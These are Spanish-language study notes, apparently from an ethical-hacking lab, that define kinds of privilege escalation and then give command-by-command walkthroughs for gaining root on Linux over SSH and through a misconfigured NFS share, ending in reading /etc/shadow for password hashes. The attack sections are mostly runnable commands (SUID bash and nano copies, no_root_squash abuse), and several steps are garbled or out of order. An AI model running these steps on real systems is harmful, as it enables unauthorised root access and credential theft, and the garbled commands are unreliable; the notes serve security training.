PRIVILEGE ESCALATION
* Escalada horizontal de privilegios : Esto ocurre cuando un usuario obtiene acceso no autorizado a la cuenta de otro usuario con el mismo nivel de permisos. Es como aprovechar una vulnerabilidad para cambiar a otra cuenta con los mismos privilegios.
* Escalada vertical de privilegios: Este tipo implica elevar los propios privilegios a un nivel superior. A menudo significa aprovecharse de una vulnerabilidad para pasar de una cuenta de nivel inferior a otra de nivel superior, como por ejemplo de un usuario estándar a un administrador.
Ejemplo: Encuentras una falla en el servidor y explotando el fallo engañas al sistema para que trate tu cuenta como administrador
* Escalada de privilegios local: Ocurre cuando un usuario explota una vulnerabilidad para obtener mayores privilegios dentro de un contexto o área específica del sistema. No afecta a todo el sistema, sino que concede acceso adicional con un alcance determinado.
* Escalada remota de privilegios: Se produce cuando un usuario aprovecha una vulnerabilidad a distancia, normalmente a través de una red. Aprovechando esta vulnerabilidad, el usuario obtiene mayores privilegios en el sistema objetivo sin acceso físico.
ESCALAR PRIVILEGIOS EN MAQUINA LINUX A TRAVES DE SSH
nmap -sV -p 22 192.168.2.0/24
ssh kali@192.168.2.4
pass@123
sudo -i
pass@123
whoami
cd /
find . -name imroot.txt
cat /home/kali/Documents/root.txt
scp kali@192.168.2.4:/home/kali/Desktop/root.txt .
./bash -p
id
whoami
cp /bin/nano
chmod 4777 nano
ls -la nano
cd /home
ls
./nano -p /etc/shado w .
contraseña de los usuarios deseados.
find / -name "*.txt" -ls 2> /dev/null
ESCALAR PRIVILEGIOS EN MAQUINA LINUX EXPLOTANDO NFS
UBUNTU
1. Instalar desde el Terminal y configurar.
sudo apt-get update
sudo apt install nfs-kernel-server
sudo nano /etc/exports
/home *(rw,no_root_squash)
La entrada /home (rw,no_root_squash) muestra que el directorio /home está compartido y permite al usuario root del cliente acceder a los archivos y realizar operaciones de lectura/escritura. El signo denota conexión desde cualquier máquina anfitriona.
2. Reiniciar para efectuar los cambios
sudo /etc/init.d/nfs-kernel-server restart
PARROT
1. Encontar la IP con el puerto 2049/tcp nfs_acl abierto
nmap -sV -p 2049 -open -Pn 192.168.2.0/24
2. Instalar la herramienta nfs-common
sudo apt-get install nfs-common
3. Comprobar si hay algún recurso compartido disponible para montar en la máquina de destino
showmount -e 192.168.2.4
Podemos ver que el directorio home es montable.
4. Crear un directorio con el nombre nfs nuestra maquina local
mkdir /tmp/nfs
5. Montar el directorio nfs en nuestra máquina local
sudo mount -t nfs 192.168.2.4:/home /tmp/nfs
6. Navegar a la carpeta nfs
cd /tmp/nfs
7. Copiar el directorio y cambiar permisos
sudo cp /bin/bash .
sudo chmod +s bash
8. Listar carpeta y obtine la cantidad de disco libre disponibles
ls -la bash
sudo df -h
9. Iniciar sesión en la máquina objetivo usando ssh.
ssh -l victima 10.10.1.9
10. Iniciar bash en la maquina objetivo
cd /home
ls
./bash -p
11. Comprobar si la conexion a sido exitosa
id
whoami
12. Comprobar el acceso root
cp /bin/nano .
chmod 4777 nano
ls -la nano
13. Instalar el editor nano en la máquina de destino para que podamos explotar el acceso root
cd /home
ls
14. Para abrir el fichero shadow, podemos copiar el hash de cualquier usuario mostrando los hashes de todos los usuarios.
./nano -p /etc/shadow